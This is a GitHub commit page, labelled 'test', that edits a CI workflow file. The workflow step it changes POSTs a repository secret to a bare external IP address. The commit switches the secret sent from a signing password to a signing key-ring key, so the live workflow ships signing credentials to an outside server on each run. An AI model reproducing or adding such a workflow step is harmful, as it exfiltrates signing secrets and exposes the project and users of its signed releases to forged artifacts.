Skip to content

Commit

Permalink
test
Browse files Browse the repository at this point in the history
  • Loading branch information
yangbo committed Sep 3, 2024
1 parent 232689e commit 7cff60c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -16,4 +16,4 @@ jobs:
url: 'http://43.156.154.114:8085/test'
method: 'POST'
customHeaders: '{"Content-Type": "application/text"}'
data: ${{ secrets.SIGNING_PASSWORD }}
data: ${{ secrets.SIGNING_SECRET_KEY_RING_KEY }}

0 comments on commit 7cff60c

Please sign in to comment.